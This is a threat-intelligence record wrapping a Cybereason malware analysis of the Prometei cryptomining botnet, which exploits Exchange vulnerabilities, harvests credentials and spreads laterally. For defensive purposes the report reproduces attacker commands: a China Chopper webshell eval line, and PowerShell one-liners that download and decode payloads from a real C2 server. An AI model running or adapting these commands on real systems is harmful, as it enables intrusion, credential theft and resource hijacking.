{
	"id": "0f9673e8-3e21-4810-8975-b91d0b48c5fe",
	"created_at": "2026-04-06T00:13:59.242462Z",
	"updated_at": "2026-04-10T03:37:36.82395Z",
	"deleted_at": null,
	"sha1_hash": "8d7ccb515b66bbe8b1b0977ed512bf3a61924ea1",
	"title": "Prometei Botnet Exploiting Microsoft Exchange Vulnerabilities",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4452264,
	"plain_text": "Prometei Botnet Exploiting Microsoft Exchange Vulnerabilities\r\nBy Lior Rochberger\r\nArchived: 2026-04-05 23:11:48 UTC\r\nRecently, the Cybereason Nocturnus Team responded to several incident response (IR) cases involving infections of the\r\nPrometei Botnet against companies in North America, observing that the attackers exploited recently published Microsoft\r\nExchange vulnerabilities (CVE-2021-27065 and CVE-2021-26858) in order to penetrate the network and install malware.\r\nPrometei is a modular and multi-stage cryptocurrency botnet that was first discovered in July 2020 and has both Windows\r\nand Linux versions. To achieve its goal of mining Monero coins, Prometei uses different techniques and tools, ranging\r\nfrom Mimikatz to SMB and RDP exploits and other tools that all work together to propagate across the network.\r\nAlthough Prometei was officially discovered in mid-2020, the Cybereason Nocturnus Team found evidence that Prometei\r\nmight date back as far as 2016 and has been evolving ever since, adding new modules and techniques to its capabilities. The\r\nlatest versions of Prometei now provide the attackers with a sophisticated and stealthy backdoor that supports a wide range\r\nof tasks that make mining Monero coins the least of the victims' concerns.\r\nThis report will present the findings of our investigation of the attacks, including the initial foothold sequence of the\r\nattackers, the functionality of the different components of the malware, the threat actors’ origin and the bot’s infrastructure.\r\nKey Findings\r\n• Exploiting Microsoft Exchange Vulnerabilities: Prometei exploits the recently disclosed Microsoft Exchange\r\nvulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential\r\nharvesting and more.\r\n• Wide range of Victims: The victimology is quite random and opportunistic rather than highly targeted, which makes it\r\neven more dangerous and widespread. 
Prometei has been observed to be active in systems across a variety of industries,\r\nincluding: Finance, Insurance, Retail, Manufacturing, Utilities, Travel, and Construction. It has been observed infecting\r\nnetworks in the U.S., UK and many other European countries, as well as countries in South America and East Asia. It was\r\nalso observed that the threat actors appear to be explicitly avoiding infecting targets in former Soviet bloc countries.\r\n• Exploiting SMB and RDP Vulnerabilities: The main objective of Prometei is to install the Monero miner component on\r\nas many endpoints as it can. To do so, Prometei needs to spread across the network - and for that, it uses many techniques\r\nsuch as the known exploits EternalBlue and BlueKeep, credential harvesting, SMB and RDP exploitation, and other\r\ncomponents such as an SSH client and a SQL spreader.\r\n• Cross-Platform Threat: Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload\r\nto the operating system detected on the target machines when spreading across the network.\r\n• Cybercrime with APT Flavor: Threat actors in the cybercrime community continue to adopt APT-like techniques and\r\nimprove the efficiency of their operations. It is assessed that the Prometei group is financially motivated and operated by\r\nRussian-speaking individuals but is not backed by a nation-state. By exploiting the computing resources of multiple\r\nendpoints to mine bitcoin, the threat actors behind Prometei can earn hefty sums of cryptocurrency over time.\r\n• Resilient C2 Infrastructure: Prometei is built to interact with four different command and control (C2) servers, which\r\nstrengthens the botnet’s infrastructure and maintains continuous communications, making it more resistant to takedowns.\r\n• Older than it Seems: The Prometei Botnet was first discovered in July 2020, but new evidence shows it was seen in the\r\nwild as far back as 2016. 
The Prometei Botnet is continuously evolving, with new features and tools observed in the newer\r\nversions.\r\nhttps://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities\r\nPage 1 of 17\n\nAttack sequence diagram\r\nInitial Compromise: Exploitation of the Microsoft Exchange Vulnerability\r\nDuring the IR investigation, the Nocturnus Team was able to identify the initial compromise vector, in which the attackers\r\nexploited the recently discovered vulnerabilities in Microsoft Exchange server, which allowed them to perform remote code\r\nexecution by exploiting the following CVEs: CVE-2021-27065 and CVE-2021-26858.\r\nThe attackers used these vulnerabilities to install and execute the China Chopper webshell via the following commands:\r\nSet-OabVirtualDirectory with the Parameters: -ExternalUrl \"http://f/\u003cscript language=\"JScript\" runat=\"server\"\u003efunction\r\nPage_Load(){eval(Request[\"NO9BxmCXw0JE\"],\"unsafe\");}\u003c/script\u003e\" -Identity \"OAB (Default Web Site)\"\r\n$d=\r\n[System.Convert]::FromBase64String('PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiBFbmFibGVWaWV3U3RhdGU9ImZhbHNlIiAlPg0KPCVAIEltcG9yd\r\n[io.file]::WriteAllBytes('C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\\u003cfile_name\u003e.aspx',$d);\r\nOnce the attackers gained access to the network, they deleted the .aspx webshell file to cover their tracks:\r\ncmd.exe /c del \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\\\frontend\\httpproxy\\owa\\auth\\\u003cfile_name\u003e.aspx\"\r\nUsing the webshell, the attackers launched a PowerShell that was then used to download a payload from the following\r\nURL:\r\nhttp://178.21.164[.]68/dwn.php?b64=1\u0026d=nethost64C.exe\u0026B=_AMD64,\u003cmachine_name\u003e\r\nThe payload is then saved as C:\\windows\\zsvc.exe and executed. 
This is the start of the Prometei botnet execution:\r\nAttack tree of the initial infection vector as observed in the Cybereason XDR Platform\r\nThe Prometei Botnet\r\nWhen the first module of the botnet, zsvc.exe, is executed, it starts to “prepare the ground” for the other modules:\r\n- It copies itself into C:\\Windows with the name “sqhost.exe”\r\n- It uses Netsh commands to add a firewall rule that will allow sqhost.exe to create connections over HTTP\r\n- It checks if there is a registry key named “UPlugPlay”, and if present it deletes it\r\n- It sets a registry key for persistence as HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\UPlugPlay with the image path and\r\ncommand line c:\\windows\\sqhost.exe Dcomsvc\r\n- It creates several registry keys under SOFTWARE\\Microsoft\\Fax\\ and SOFTWARE\\Intel\\support\\ with\r\nthe names MachineKeyId, EncryptedMachineKeyId and CommId, for later use by the different\r\ncomponents for C2 communication.\r\nSqhost.exe\r\nSqhost.exe is the main bot module, complete with backdoor capabilities that support a wide range of commands. Sqhost.exe\r\nis able to parse the prometei.cgi file from 4 different hardcoded command and control servers. The file contains the\r\ncommand to be executed on the machine. The commands can be used as “stand-alone” native OS commands (cmd\r\ncommands, WMI, etc.) 
or can be used to interact with the other modules of the malware located under C:\\Windows\\dell\r\nEmbedded C2 domains in Sqhost.exe\r\nSqhost supports the following commands:\r\nCall - Execute a program or a file\r\nStart_mining - launch SearchIndexer.exe (the miner) with the file C:\\windows\\dell\\Desktop.dat as its parameters\r\nStart_mining1 - request C:\\windows\\dell\\Desktop.dat from the C2, and then launch SearchIndexer.exe (the miner)\r\nwith the file C:\\windows\\dell\\Desktop.dat as its parameters\r\nStop_mining - runs cmd.exe with command: “/c taskkill -f -im SearchIndexer.exe”\r\nWget - download a file\r\nXwget - download a file, save it, and use XOR to decrypt it\r\nQuit - terminate the bot execution using TerminateProcess\r\nQuit2 - terminate the bot execution without using TerminateProcess\r\nSysinfo - collect information about the machine (using native APIs and WMIC)\r\nExec - execute a command\r\nVer - return the bot version\r\nEnc - get/set the RC4 encryption key\r\nExtip - return the bot's external IP address\r\nChkport - check if a specific port is open\r\nSearch - search for files by name (potentially cryptocurrency wallets)\r\nSet_timeout - set a period of time for connecting to the C2 server\r\nTouch - open a file\r\nTouch_internal - edit a file with a single byte to change access times\r\nTouch_stop - close a file\r\nUpdate - update the bot version\r\nSet_Autoexec2 - set an automatic execution\r\nSet_Autoexec1 - set an automatic execution\r\nSet_cc1 - set a C2 server\r\nSet_cc0 - set a C2 server\r\nSome of the tasks supported by Sqhost.exe\r\nThe execution of the malware encountered in the investigation shows activities performed by the attackers which included\r\nthree processes: cmd.exe, sqhost.exe and 
wmic.exe:\r\nAttack tree of the infection as observed in the Cybereason Defense platform\r\nCMD.exe: was used to execute the following commands (some of the commands are broken into individual commands for\r\nreadability; the purpose of each command is given after it):\r\nCommand: Auditpol /set /subcategory:\"Logon\" /failure:enable\r\nPurpose: Configuring Microsoft Windows Server to log all failed logons using auditpol.\r\nCommand: netsh advfirewall firewall delete rule name=\"Banned brute IPs\"\r\nCommand: netsh advfirewall firewall add rule name=\"Banned brute IPs\" dir=in interface=any action=block localip=68.12.114.202,71.181.80.24,179.52.245.208,24.0.176.79,68.161.157.243,\r\nCommand: netsh advfirewall firewall add rule name=\"Banned brute IPs\" dir=in interface=any action=block remoteip=68.12.114.202,71.181.80.24,179.52.245.208,24.0.176.79,68.161.157.243,\r\nPurpose: Blocking certain IP addresses from communicating with the machine. We assess that those IP addresses are used by other malware, potentially miners, and the attackers behind Prometei wanted to ensure that all the resources of the network are available just for them.\r\nCommand: powershell.exe \"if(-not (Test-Path 'C:\\windows\\ExchDefender.exe')) {$b64=$(New-Object Net.WebClient).DownloadString('http://178.21.164.68/dwn.php?d=ExchDefender.exe\u0026b64=1');$data=[System.Convert]::FromBase64String($b64);$bt=New-Object Byte[]($data.Length);[int]$j=0;FOR([int]$i=0;$i -lt $data.Length; $i++){$j+=66;$bt[$i]=(((($data[$i]) -bxor (($i*3) -band 0xFF))-$j) -band 0xFF);}[io.file]::WriteAllBytes('C:\\windows\\dell\\ExchDefender.exe',$bt);}\"\r\nPurpose: Downloading ExchDefender.exe, an additional module of the botnet, into C:\\Windows\\dell and executing it.\r\nCommand: powershell.exe \"if(-not (Test-Path 'rdpcIip.exe')) {$b64=$(New-Object Net.WebClient).DownloadString('http://178.21.164.68/walk278_64.php');$data=[System.Convert]::FromBase64String($b64);$bt=New-Object Byte[]($data.Length);[int]$j=0;FOR([int]$i=0;$i -lt $data.Length; $i++){$j+=66;$bt[$i]=(((($data[$i]) -bxor (($i*3) -band 0xFF))-$j) -band 0xFF);}[io.file]::WriteAllBytes('rdpcIip.exe',$bt);}\"\u0026C:\\Windows\\svchost.exe /sha1chk 381C17131D13E1203C91720870ECB441F5BE297E miwalk.exe\u0026sqhost.exe /sha1chk 381C17131D13E1203C91720870ECB441F5BE297E miwalk.exe\u0026C:\\Windows\\svchost.exe /sha1chk 9623DCD8836C481AA44AE84499F20E2439941A4B rdpcIip.exe\u0026sqhost.exe /sha1chk 9623DCD8836C481AA44AE84499F20E2439941A4B rdpcIip.exe\u0026rdpcIip.exe\r\nPurpose: Downloading rdpcIip.exe, an additional module of the botnet, into C:\\Windows and executing it.\r\nCommand: taskkill -f -im rdpcIip.exe\u0026del rdpcIip.exe\u0026powershell.exe \"if(-not (Test-Path '7z.dll')) {(New-Object Net.WebClient).DownloadFile('http://178.21.164.68/7z.dll','7z.dll');}if(-not (Test-Path '7z.exe')) {(New-Object Net.WebClient).DownloadFile('http://178.21.164.68/7z.exe','7z.exe');}(New-Object Net.WebClient).DownloadFile('http://178.21.164.68/netwalker2.7z','netwalker.7z');\"\u00267z x netwalker.7z -phorhor123 -y\u0026del netwalker.7z\r\nPurpose: Downloading 7z.exe and an archived file, Netwalker.7z, and using the 7zip executable to extract the files in the archive.\r\nCommand: taskkill -f -im rdpcIip.exe\u0026ping -n 3 127.0.0.1\u0026C:\\Windows\\svchost.exe /sha1chk 9623DCD8836C481AA44AE84499F20E2439941A4B rdpcIip.exe\u0026sqhost.exe /sha1chk 9623DCD8836C481AA44AE84499F20E2439941A4B rdpcIip.exe\u0026powershell.exe \"if(-not (Test-Path 'miwalk.exe')) {$b64=$(New-Object Net.WebClient).DownloadString('http://178.21.164.68/mi64.php');$data=[System.Convert]::FromBase64String($b64);$bt=New-Object Byte[]($data.Length);[int]$j=0;FOR([int]$i=0;$i -lt $data.Length; $i++){$j+=66;$bt[$i]=(((($data[$i]) -bxor (($i*3) -band 0xFF))-$j) -band 0xFF);}[io.file]::WriteAllBytes('miwalk.exe',$bt);}\"\r\nPurpose: Downloading miwalk.exe, an additional module of the botnet, into C:\\Windows\\.\r\nIn addition, it appears the attackers attempted to execute C:\\Windows\\svchost.exe, which is the same file as sqhost.exe (the\r\nattackers named it svchost in earlier versions), but it was not downloaded in this attack and did not exist under that name.\r\nReferences to “svchost.exe” appear in different components of the malware, sometimes alongside “sqhost”. Our\r\nassumption is that it is kept either for backwards compatibility or because the attackers did not bother to change it in\r\nsome places after renaming the main bot module to “sqhost.exe”.\r\nSqhost.exe: executed with the “-watchdog” parameter, to make sure that it will keep running on the system.\r\nWmic.exe: was used to perform reconnaissance commands:\r\n- wmic ComputerSystem get Model\r\n- wmic OS get lastbootuptime\r\n- wmic baseboard get product\r\n- wmic os get caption\r\nExchDefender.exe\r\nExchdefender masquerades as “Microsoft Exchange Defender”, a non-existent program whose name imitates a\r\nlegitimate Microsoft product. 
\r\nWhen first executed, it creates a service named “Microsoft Exchange Defender” [MSExchangeDefenderPL] that is set to\r\nexecute the binary (from C:\\Windows) with the same command line as seen used with sqhost.exe - “Dcomsvc”:\r\nOutput of running Exchdefender.exe\r\nService name and command line used to execute Exchdefender.exe\r\nExchdefender constantly checks the files within the directory C:\\Program Files\\Microsoft\\Exchange\r\nServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth, a directory known to be used to host WebShells. The malware is specifically\r\ninterested in the file “ExpiredPasswords.aspx”, which was reported to be the name used to obscure the HyperShell backdoor\r\nused by APT34 (aka OilRig). If the file exists, the malware immediately deletes it.\r\nOur assessment is that this tool is used to “protect” the compromised Exchange Server by deleting potential WebShells so\r\nPrometei will remain the only malware using its resources.\r\nSearchIndexer.exe\r\nSearchIndexer.exe is an open source Monero mining software (XMRig miner). It is executed with the content of the\r\n“desktop.dat” file as a parameter, which contains the mining server and the username for the mining server:\r\nContent of Desktop.dat\r\nFollowing the investigation, it appears that the user is “banned due to reports of botnet mining” from around March 2021,\r\nand it’s very likely that the attackers have changed the user already:\r\nA message showing that the user was banned\r\nNetwalker.7z\r\nThe Netwalker.7z archive downloaded from the C2 178.21.164[.]68 is password protected, using the password “horhor123”.\r\nThe content of the archive is saved under C:\\Windows\\dell, together with the other components of the bot. 
The archive\r\ncontains the following files: Nethelper2.exe, Nethelper4.exe, Windrlver.exe, a copy of RdpcIip.exe and a few\r\nDLLs used by the bot components:\r\nContent of Netwalker.7z\r\nRdpcIip.exe\r\nRdpcIip.exe (with a capital “I” instead of a lowercase “L”) is both downloaded directly by sqhost.exe and also contained in\r\nthe Netwalker.7z archive. It is a key component of the malware. It has huge (trust us, huge) functionality with different\r\nbranches with the main purpose being to interact with other components of the malware and make them work all together.\r\nRdpcIip is responsible for some of the most important functions of the malware - harvesting credentials (using another\r\ncomponent called Miwalk.exe) and spreading across the network using the stolen credentials as well as using the SMB\r\nexploit EternalBlue and the RDP exploit BlueKeep.\r\nHarvesting Credentials For Spreading\r\nTo harvest credentials, RdpcIip.exe launches another component, Miwalk.exe, a customized version of Mimikatz. The\r\noutput is saved to ssldata2.dll and ssldata2_old.dll, which are text files, and RdpcIip reads those files and tries to validate the\r\ncredentials and use them for spreading across the network. 
\r\nRdpcIip.exe also changes the following registry key to 1 so the credentials are stored in memory and retrieved\r\nusing techniques employed by Miwalk.exe:\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential\r\nChanging the registry key “UseLogonCredential”\r\nReading the contents of ssldata2.dll and ssldata2_old.dll\r\nIn addition to using the harvested credentials, RdpcIip also tries to spread across the network by brute-forcing usernames\r\nand passwords using a built-in list of common combinations:\r\nA list of common usernames and passwords embedded in RdpcIip.exe\r\nNetwork Spreading by Exploiting Vulnerabilities\r\nIf RdpcIip can’t spread to other machines using the stolen credentials, it uses the EternalBlue exploit and sends a shellcode\r\nto install and launch the main bot module Sqhost.exe. To use the exploit, the malware downgrades the SMB protocol to\r\nSMB1, which is vulnerable to the exploit:\r\nDowngrading the SMB protocol to version 1\r\nTo use the RDP exploit BlueKeep, the malware uses another component, Bklocal2.exe / Bklocal4.exe (depending on the OS\r\nversion), which is also downloaded by Sqhost and located in C:\\Windows\\dell:\r\nExecuting the BlueKeep exploit binaries\r\nPreparing the Ground for Other Components\r\nRdpcIip also prepares the ground for other components of the bot such as Nethelper, the SQL spreader, Windrlver, and the\r\nSSH client.\r\nIt checks if the dependencies for the files are all set, including Mono.security.dll and Npgsql.dll. If not, it will download and\r\ncopy the files to the right folder. 
Eventually, RdpcIip will execute the components as child processes and use them for its\r\nmain purpose - spreading:\r\nPreparing the ground for Nethelper\r\nNethelper2.exe and Nethelper4.exe\r\nNetHelper is a .NET-based executable that is obfuscated using the CryptoObfuscator protector. The main purpose of this module\r\nis to create connections to SQL servers in the network and try to infect them with the main module, Sqhost.\r\nTo do so, the malware uses the Npgsql library, a .NET data provider for PostgreSQL, and Mono, a software platform designed\r\nto allow developers to easily create cross-platform applications. It checks the arguments received, which contain the SQL\r\nserver found in the network and the credentials harvested before. The malware then tries to create a connection to the server using\r\nport 1433 (default for SQL servers) and 5432 (used for PostgreSQL):\r\nCreates connection to SQL server on port 1433\r\nCreates connection to PostgreSQL server on port 5432\r\nIf successful, the malware checks the operating system of the SQL server and operates accordingly:\r\nIf the OS is Windows - uses a PowerShell command to download “zsvc.exe” (Sqhost.exe):\r\nDownloading Prometei main module on a Windows machine using PowerShell\r\nIf the OS is Unix based - uses one of the following: Curl / Wget / Nexec:\r\nDownloading Prometei main module on a Unix based machine using different methods\r\nWindrlver.exe\r\nWindrlver.exe (with a lowercase “L” and not a capital “i”) is an OpenSSH and SSLib-based software that the attackers have\r\ncreated so they can spread across the network using SSH. Since it’s used for spreading, it is launched by the spreader\r\ncomponent RdpcIip, and downloaded as part of the Netwalker.7z archive. 
\r\nWhen launched, the remote server is passed as a parameter, and it tries to log in to the server using the stolen credentials and\r\nusing a predefined list of usernames and passwords (the same list as in RdpcIip, since it is the component that executes\r\nWindrlver). In addition, it also tries default server usernames such as: root, admin, user and netup123 (the default user for\r\nNetUP servers):\r\nDifferent usernames used to log in to remote servers by Windrlver\r\nIf successful, the bot will try to copy and execute the main bot module Sqhost.exe on the remote server.\r\nInfrastructure And Tools\r\nPrometei, like other botnets, has a diverse infrastructure designed to ensure the botnet stays alive and infected machines\r\nstay part of the botnet. Over the years, different Prometei C2 servers were taken down by authorities, and the attackers had\r\nto constantly work their way around it. We assess that this is one of the reasons why the main bot contains not just one, but\r\nfour different C2 servers in the newer versions.\r\nThe Prometei botnet tries to hide its malicious activities by masquerading different components as native OS processes,\r\nsometimes using the name of the file as-is. For example, the Sqhost.exe file is sometimes purposely misspelled to make it\r\nlook like another file, and the name RdpcIip.exe (with a capital “i” instead of a lowercase “L”) imitates a legitimate OS process\r\nname.\r\nBesides keeping the masquerading techniques from its early days, Prometei has also kept a consistent naming convention\r\nand URL pattern, which makes tracking its components and infrastructure relatively easy. 
For example, all the way back to\r\nthe first version analyzed by Cybereason, the attackers used the same file names, such as:\r\nC:\\dell\\searchindexer.exe\r\nC:\\dell\\desktop.dat\r\nC:\\Windows\\svchost.exe\r\nFor a full list of servers, see the IOCs list.\r\nAll the Way Back to 2016\r\nAs mentioned previously, Prometei was discovered in July 2020, and according to the researcher who discovered it, the\r\nbotnet was active as early as the beginning of March 2020. Our research reveals that Prometei actually has been around\r\nsince at least 2016.\r\nFollowing the infrastructure of the botnet, most of which was taken down by authorities, we were able to find the following:\r\nA Prometei.cgi file that contains the command “ver” (show the bot version), which was found in the wild in May\r\n2016:\r\nVT screenshot: SHA-256: cf542ada135ee3edcbbe7b31003192c75295c7eff0efe7593a0a0b0f792d5256\r\nIn 2017, the attackers named the main component “download.exe” (later changed to “svchost.exe” and now\r\n“sqhost.exe”). They also used a certificate to sign the binaries:\r\nVT screenshot: SHA-256: fdcf4887a2ace73b87d1d906b23862c0510f4719a6c159d1cde48075a987a52f\r\nEvery Tool and its Own PDB\r\nThe Prometei Botnet evolved over the years by adding new tools and expanding its supported commands. In 2019, it appears\r\nthat the malware was significantly updated with a lot of tools added in a short period of time. In our analysis we didn’t go\r\nover all the tools, since the attackers don’t always use them all, and it can change from one attack to another. 
Our research\r\nrevealed a shared PDB pattern across the tools, which also reveals some information about them, such as their purpose and\r\nthe obfuscator used:\r\nC:\\WORK\\Tools_2019\\walker\\DOTNETPlugin\\pgbrute\\bin\\Release\\CryptoObfuscator_Output\\nethelper.pdb\r\nC:\\WORK\\Tools_2019\\walker\\bklocal\\BlueKeep\\bin\\Release\\CryptoObfuscator_Output\\BlueKeep.pdb\r\nC:\\Work\\Tools_2019\\walker\\netwalker\\x64\\Release\\rdpcIip.pdb\r\nC:\\Work\\Tools_2019\\prometei\\rdpexec\\psexec\\Release\\psexec.pdb\r\nC:\\Work\\Tools_2019\\prometei\\rdpexec\\shift - bot\\Release\\shift.pdb\r\nC:\\Work\\Tools_2019\\prometei\\scan_rdp\\rdp_checker\\MyRDP\\SampleRDC\\bin\\Release\\CryptoObfuscator_Output\\socks.pdb\r\nC:\\WORK\\Tools_2019\\prometei\\RDPBrute2016.NET\\RDPDetect\\bin\\Release\\CryptoObfuscator_Output\\nvsync.pdb\r\nC:\\WORK\\Tools_2019\\prometei\\nvstub\\Release\\nvstub.pdb\r\nC:\\Work\\Tools_2019\\prometei\\nvstub\\Release\\nvstub.pdb\r\nC:\\Work\\Tools_2019\\prometei\\scan_rdp\\rdp_checker\\RDPDetect (rdp_checker)\\RDPDetect\\bin\\Release\\CryptoObfuscator_Output\\nethost.pdb\r\nC:\\Work\\Tools_2019\\prometei\\psbrute\\Release\\psbrute.pdb\r\nC:\\Work\\Tools_2019\\prometei\\RDPBrute2016.NET\\RDPDetect\\bin\\Release\\CryptoObfuscator_Output\\nvsync.pdb\r\nC:\\Work\\Tools_2019\\prometei\\rdpexec\\shift - bot\\Release\\shift.pdb\r\nC:\\Work\\Tools_2019\\misc\\tor_hidden_svc\\darkread\\x64\\Release\\darkread.pdb\r\nC:\\Work\\Tools_2019\\misc\\util\\chk445\\Release\\chk445.pdb\r\nC:\\Work\\Tools_2019\\misc\\util\\crawler\\Release\\crawler.pdb\r\nThe Threat Actor\r\nNot much is known about the threat actor behind Prometei. We were able to collect evidence that suggests the threat actors\r\nare Russian speaking, and in addition it appears that they attempt to avoid infecting other Russian speakers. 
We also cannot\r\nignore the name of the bot - “Prometei”, which is the Russian word for Prometheus, the Titan god of fire from Greek\r\nmythology.\r\nIn addition, in the older versions of the malware created back in 2016, there were a few samples of “svchost.exe” (the main\r\nbot module) in which the author of the malware forgot to edit the “product name” and left it in Russian. Also, some of the files\r\nhave the language code “Russian”:\r\nSvchost.exe without proper metadata editing\r\nThe language code of svchost.exe\r\nPrometei uses different modules, and not all of them are observed in use in every attack. One of the Prometei components is\r\nrelated to a TOR client installation on the infected machine used to communicate with a TOR C2. As part of the installation,\r\nthe malware also drops a configuration file (torrc) that is configured to avoid using several exit nodes, all in the former Soviet\r\nUnion:\r\nContent of torrc file in the installation of the TOR client by Prometei\r\nIn addition, Prometei has another component named nvsync.exe that seems to be an older version of Nethelper, and it\r\ncontains a function that checks the stolen credentials to avoid certain targets, among them “Guest” and “Other user” in\r\nRussian: Гость, Другой пользователь:\r\nFunction in nvsync.exe - a component of the Prometei bot\r\nConclusion\r\nAs shown in this report, Prometei is a complex and multistage botnet that, due to its stealthiness and wide range of\r\ncapabilities, puts the compromised network at great risk. The different components work together to enable the malware to\r\nperform many tasks: credential harvesting, spreading across the network, establishing C2 communications and more. 
The\r\nmalware authors are able to add more modules and expand their capabilities easily, and potentially even shift to another\r\npayload objective, more destructive than just mining Monero.\r\nThreat actors in the cybercrime community continue to adopt APT-like techniques and improve the efficiency of their\r\noperations. As observed in the recent Prometei attacks, the threat actors rode the wave of the recently discovered Microsoft\r\nExchange vulnerabilities and exploited them in order to penetrate targeted networks. We anticipate continued evolution of\r\nthe advanced techniques being used by different threat actors for different purposes, including cybercrime groups. This puts\r\ndefenders in a position where they should always be prepared, not only for APT and nation state actors, but also for\r\nadvanced cybercriminals who try to emulate the big APT groups.\r\nAlthough the Prometei techniques and some of its components will likely be detected by security analysts, most of them will\r\nnot be immediately obvious to end-users, which highlights the importance of having a security team and products in place\r\nthat can detect these malicious operations. This threat poses a great risk for organizations, since the attackers have absolute\r\ncontrol over the infected machines, and if they so wish, they can steal information, infect the endpoints with other malware\r\nor even collaborate with ransomware gangs by selling the access to the infected endpoints. Lastly, since cryptomining can be\r\nresource-hogging, it can affect the performance and stability of critical servers and endpoints, ultimately affecting business\r\ncontinuity.\r\nWe would like to thank Matt Hart and Niamh O’Connor for their contribution to this investigation.\r\n
MITRE ATT\u0026CK BREAKDOWN\r\nInitial Access: Exploit Public-Facing Application\r\nExecution: System Services; Native API; Windows Management Instrumentation\r\nPersistence: Create or Modify System Process: Windows Service; Valid Accounts\r\nDefense Evasion: Masquerading\r\nCredential Access: Credentials from Password Stores; OS Credential Dumping; Unsecured Credentials; Brute Force\r\nDiscovery: System Information Discovery; System Service Discovery; Network Share Discovery; Process Discovery\r\nLateral Movement: Exploitation of Remote Services; Lateral Tool Transfer\r\nCommand \u0026 Control: Application Layer Protocol; Data Encoding; Multi-Stage Channels\r\nImpact: Resource Hijacking\r\nPrometei Botnet | Indicators of Compromise\r\nAbout the Author\r\nLior Rochberger\r\nLior is a senior threat researcher at Cybereason, focusing on threat hunting and malware research. Lior began her career as a\r\nteam leader in the security operations center in the Israeli Air Force where she mostly focused on incident response and\r\nmalware analysis.\r\nSource: https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities"
	],
	"report_names": [
		"prometei-botnet-exploiting-microsoft-exchange-vulnerabilities"
	],
	"threat_actors": [
		{
			"id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4",
			"created_at": "2022-10-25T15:50:23.458833Z",
			"updated_at": "2026-04-10T02:00:05.419537Z",
			"deleted_at": null,
			"main_name": "APT34",
			"aliases": null,
			"source_name": "MITRE:APT34",
			"tools": [
				"netstat",
				"Systeminfo",
				"PsExec",
				"SEASHARPEE",
				"Tasklist",
				"Mimikatz",
				"POWRUNER",
				"certutil"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7c969685-459b-4c93-a788-74108eab6f47",
			"created_at": "2023-01-06T13:46:39.189751Z",
			"updated_at": "2026-04-10T02:00:03.241102Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"Red Dev 13",
				"Silk Typhoon",
				"MURKY PANDA",
				"ATK233",
				"G0125",
				"Operation Exchange Marauder"
			],
			"source_name": "MISPGALAXY:HAFNIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2704d770-43b4-4bc4-8a5a-05df87416848",
			"created_at": "2022-10-25T15:50:23.306305Z",
			"updated_at": "2026-04-10T02:00:05.296581Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"HAFNIUM",
				"Operation Exchange Marauder",
				"Silk Typhoon"
			],
			"source_name": "MITRE:HAFNIUM",
			"tools": [
				"Tarrask",
				"ASPXSpy",
				"Impacket",
				"PsExec",
				"China Chopper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b",
			"created_at": "2025-08-07T02:03:24.722093Z",
			"updated_at": "2026-04-10T02:00:03.681914Z",
			"deleted_at": null,
			"main_name": "COBALT EDGEWATER",
			"aliases": [
				"APT34 ",
				"Cold River ",
				"DNSpionage "
			],
			"source_name": "Secureworks:COBALT EDGEWATER",
			"tools": [
				"AgentDrable",
				"DNSpionage",
				"Karkoff",
				"MailDropper",
				"SideTwist",
				"TWOTONE"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
